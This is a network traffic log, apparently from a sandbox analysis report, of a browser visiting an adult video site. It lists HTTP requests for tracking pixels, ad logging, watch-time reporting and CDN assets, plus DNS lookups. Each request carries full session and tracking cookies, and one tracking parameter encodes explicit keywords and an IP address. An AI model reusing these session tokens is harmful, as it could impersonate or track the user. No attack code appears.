GET /_xa/deep_pixel?info=CiQ5ZjgyNGRlMy1lOWRiLTRhMTYtYmMwYy1kNGU3YmNmMDgxMzUQm8eFuAYaIjcyNGJmMmE0ZjczNzRjMjNiM2FhOTIzNDBiZTZlMGNiLTEoATC98AE4vfABSL%2BnzOEDUgEyWJf4kN0DYLmOjf4DciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB%2FKnx0k1iMD%2BSAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzUyNogCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgC5ebHjgfgAr2s1KcE8gIkZWQ0NGFkMDgtZjg5YS1hMDZlLTBhOWEtZGIwNzhjZDcyOWQx%2BgIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuwgMFdmlkZW%2BSBA9TZW5zZW1ha2VycyBCLlaoBAGyBAMDAgHSBALkBdgEGQ%3D%3D&noc=0&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:44 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/fla/log?action=ad_view&ad_id=1069762361&campaign_id=1009980351&initial_zone_id=30781&member_id=1000619031&zone_id=30781

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/fla/log?action=ad_view&ad_id=1069762361&campaign_id=1009980351&initial_zone_id=30781&member_id=1000619031&zone_id=30781 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: nginx
date: Sat, 05 Oct 2024 16:04:45 GMT
content-length: 0
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/service-worker.js

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /service-worker.js HTTP/2.0
host: www.pornhub.com
cache-control: max-age=0
dnt: 1
accept: */*
service-worker: script
sec-fetch-site: same-origin
sec-fetch-mode: same-origin
sec-fetch-dest: serviceworker
referer: https://www.pornhub.com/service-worker.js
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
if-none-match: "66ff0124-2ab"
if-modified-since: Thu, 03 Oct 2024 20:40:04 GMT

Response

HTTP/2.0 304

server: openresty
date: Sat, 05 Oct 2024 16:04:47 GMT
last-modified: Thu, 03 Oct 2024 20:40:04 GMT
etag: "66ff0124-2ab"
x-frame-options: SAMEORIGIN
expires: Sun, 02 Feb 2025 16:04:47 GMT
cache-control: max-age=10368000
pragma: public
cache-control: public
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://www.pornhub.com/utils/reportTimeWatched

msedge.exe

Remote address:

66.254.114.41:443

Request

POST /utils/reportTimeWatched HTTP/2.0
host: www.pornhub.com
content-length: 441
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: multipart/form-data; boundary=----WebKitFormBoundarypIHYR0BACnoNxNjw
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:05:12 GMT
content-type: application/json; charset=utf-8
x-frame-options: SAMEORIGIN
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
DNS

210.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.114.254.66.in-addr.arpa

IN PTR

Response

210.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

static.trafficjunky.com

msedge.exe

Remote address:

8.8.8.8:53

Request

static.trafficjunky.com

IN A

Response

static.trafficjunky.com

IN CNAME

static.trafficjunky.com.sds.rncdn7.com

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.19

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.17

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.16

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.21

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.23

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.22

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.18

static.trafficjunky.com.sds.rncdn7.com

IN A

64.210.156.20
DNS

ei.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ei.phncdn.com

IN A

Response

ei.phncdn.com

IN CNAME

ei.phncdn.com.sds.rncdn7.com

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.21

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.18

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.19

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.17

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.23

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.22

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.20

ei.phncdn.com.sds.rncdn7.com

IN A

64.210.156.16
GET

https://static.trafficjunky.com/invocation/embeddedads/production/embeddedads.es6.min.js

msedge.exe

Remote address:

64.210.156.19:443

Request

GET /invocation/embeddedads/production/embeddedads.es6.min.js HTTP/2.0
host: static.trafficjunky.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Thu, 26 Sep 2024 15:24:50 GMT
etag: W/"82171bb5b-16cf3-6230756e73480"
expires: Wed, 29 Jan 2025 13:08:19 GMT
cache-control: max-age=1738156099
content-encoding: br
x-cdn-diag: lon1-16032-1-282281-h-0-0---;16008-83-390825----0-0-0
GET

https://static.trafficjunky.com/ab/ads_test.js

msedge.exe

Remote address:

64.210.156.19:443

Request

GET /ab/ads_test.js HTTP/2.0
host: static.trafficjunky.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Wed, 26 Jul 2023 19:30:36 GMT
etag: W/"6bb93e32b-7e3-60168e1c0cf00"
expires: Mon, 23 Dec 2024 04:28:16 GMT
cache-control: max-age=21600
content-encoding: br
x-cdn-diag: lon1-16032-2-282343-h-0-0---;16008-83-390825----0-0-0
GET

https://static.trafficjunky.com/invocation/popunder/production/popunder.min.js

msedge.exe

Remote address:

64.210.156.19:443

Request

GET /invocation/popunder/production/popunder.min.js HTTP/2.0
host: static.trafficjunky.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Thu, 25 Jul 2024 18:37:36 GMT
etag: W/"2e4fe4eef-735b-61e16b049bc00"
expires: Sun, 24 Nov 2024 02:38:12 GMT
cache-control: max-age=1732415892
content-encoding: br
x-cdn-diag: lon1-16008-1-119169-h-0-0---;16008-23-390825----0-0-1
GET

https://ei.phncdn.com/www-static/css/ph-icons.css?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/ph-icons.css?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: text/css
content-length: 2592
last-modified: Thu, 03 Oct 2024 16:32:38 GMT
etag: "66fec726-a20"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:51 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16009-1-3934145-h-0-0---;16009-88-10195----0-0-0
GET

https://ei.phncdn.com/www-static/css/front-index-pc.css?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/front-index-pc.css?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: text/css
content-length: 7229
last-modified: Thu, 03 Oct 2024 16:32:38 GMT
etag: "66fec726-1c3d"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-3-206877-h-0-0---;16009-61-10195----0-0-1
GET

https://ei.phncdn.com/www-static/css/flags/round_flag.css?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/flags/round_flag.css?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: text/css
content-length: 2065
last-modified: Thu, 03 Oct 2024 16:32:38 GMT
etag: "66fec726-811"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:51 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-1-282284-h-0-0---;16009-61-10195----0-0-0
GET

https://ei.phncdn.com/www-static/css/generated-header.css?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/generated-header.css?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: text/css
content-length: 66932
last-modified: Thu, 03 Oct 2024 16:32:38 GMT
etag: "66fec726-10574"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:53 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-1-282283-h-0-0---;16009-61-10195----0-0-0
GET

https://ei.phncdn.com/www-static/css/global-backgrounds.css?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/global-backgrounds.css?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/javascript
content-length: 7016
last-modified: Thu, 03 Oct 2024 11:20:13 GMT
etag: "66fe7ded-1b68"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:51 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-282545-h-0-0---;16009-61-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/cookieBanner/cookie_banner.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/cookieBanner/cookie_banner.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/javascript
content-length: 3899
last-modified: Wed, 14 Aug 2024 13:17:50 GMT
etag: "66bcae7e-f3b"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:51 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-2-206701-h-0-0---;16009-61-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/utils/mg_utils-1.0.0.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/utils/mg_utils-1.0.0.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: text/css
content-length: 1931
last-modified: Thu, 03 Oct 2024 16:32:38 GMT
etag: "66fec726-78b"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:53 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-119405-h-0-0---;16009-61-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/ph-functions.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/ph-functions.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/javascript
content-length: 9080
last-modified: Thu, 03 Oct 2024 15:34:20 GMT
etag: "66feb97c-2378"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:51 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-3-206877-h-0-0---;16009-61-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/mg_modal-1.0.0.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/mg_modal-1.0.0.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/javascript
content-length: 1284
last-modified: Wed, 21 Aug 2024 18:55:53 GMT
etag: "66c63839-504"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:51 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-119405-h-0-0---;16009-10-10195----0-0-0
GET

https://ei.phncdn.com/www-static/images/pornhub_logo_straight.svg?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/images/pornhub_logo_straight.svg?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: image/svg+xml
content-length: 2338
last-modified: Thu, 01 Jun 2023 20:31:47 GMT
